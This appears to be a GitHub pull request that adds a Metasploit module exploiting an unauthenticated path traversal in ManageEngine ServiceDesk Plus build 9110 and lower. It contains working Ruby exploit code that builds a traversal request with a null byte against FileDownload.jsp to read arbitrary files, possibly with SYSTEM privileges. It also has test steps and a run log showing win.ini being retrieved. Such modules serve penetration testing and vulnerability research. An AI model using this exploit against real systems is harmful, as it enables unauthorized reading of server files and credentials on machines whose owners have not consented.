### PR TITLE
Add ManageEngine ServiceDesk Plus Path Traversal module

### DIFF
--- a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb
+++ b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine ServiceDesk Plus Path Traversal",
+      'Description'    => %q{
+        This module exploits an unauthenticated path traversal vulnerability found in ManageEngine
+        ServiceDesk Plus build 9110 and lower. The module will retrieve any file on the filesystem
+        with the same privileges as Support Center Plus is running. On Windows, files can be retrieved
+        with SYSTEM privileges.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
+      'References'     =>
+        [
+        ],
+      'DisclosureDate' => "Oct 03 2015"
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'The base path to the ServiceDesk Plus installation', '/']),
+        OptString.new('FILE', [true, 'The file to retrieve', '/windows/win.ini'])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    uri = target_uri.path
+    peer = "#{ip}:#{rport}"
+
+    vprint_status("#{peer} - Retrieving file #{datastore['FILE']}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, "workorder", "FileDownload.jsp"),
+      'vars_get' =>
+      {
+        'module' => 'support',
+        'fName' => "/../../../../../../../../../../../../#{datastore['FILE']}\x00",
+      }
+    })
+
+    # If we don't get a 200 when we request our malicious payload, we suspect
+    # we don't have retrieved the file either. Print the status code for debugging purposes.
+    # The "The File was not found" string is returned on a vulnerable environment but the file is not found.
+    # The "Loding domain list To login AD authentication or local Authentication" string is returned in the response on a fixed version (build 9111)
+    if res && res.code == 200
+      if res.body =~ /The File was not found/
+        vprint_error("#{peer} - Vulnerable server, but the file does not exist!")
+      elsif res.body =~ /Loding domain list To login AD authentication or local Authentication/
+        vprint_error("#{peer} - The installed version of ManageEngine ServiceDesk Plus is not vulnerable!")
+      else
+        data = res.body
+        p = store_loot(
+          'manageengine.servicedeskplus',
+          'application/octet-stream',
+          ip,
+          data,
+          datastore['FILE']
+        )
+        print_good("#{peer} - [ #{datastore['FILE']} ] loot stored as [ #{p} ]")
+      end
+    else
+        vprint_error("#{peer} - Server returned #{res.code.to_s}")
+    end
+  end
+end
+


### PR DESCRIPTION
This adds an auxiliary module for ManageEngine ServiceDesk Plus 9.1 build 9110 and lower. The module exploits an unauthenticated path traversal vulnerability.

Further EDB ID and other links will be added to the module when these will be available.

Steps to test:

- I've provided the vulnerable build 9110 for download at http://0x90.nl/ManageEngine_ServiceDesk_Plus_64bit.exe (You can download the fixed version directly from ManageEngine here: https://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus_64bit.exe)
- Install on a Windows VM and keep all settings default
- Run the Metasploit module!


msf > use auxiliary/scanner/http/servicedesk_plus_traversal
msf auxiliary(servicedesk_plus_traversal) > set RHOSTS 192.168.2.129
RHOSTS => 192.168.2.129
msf auxiliary(servicedesk_plus_traversal) > run

[+] 192.168.2.129:8080 - [ /windows/win.ini ] loot stored as [ /root/.msf4/loot/20151003155243_default_192.168.2.129_manageengine.ser_737694.ini ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(servicedesk_plus_traversal) > cat /root/.msf4/loot/20151003155243_default_192.168.2.129_manageengine.ser_737694.ini
[*] exec: cat /root/.msf4/loot/20151003155243_default_192.168.2.129_manageengine.ser_737694.ini

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
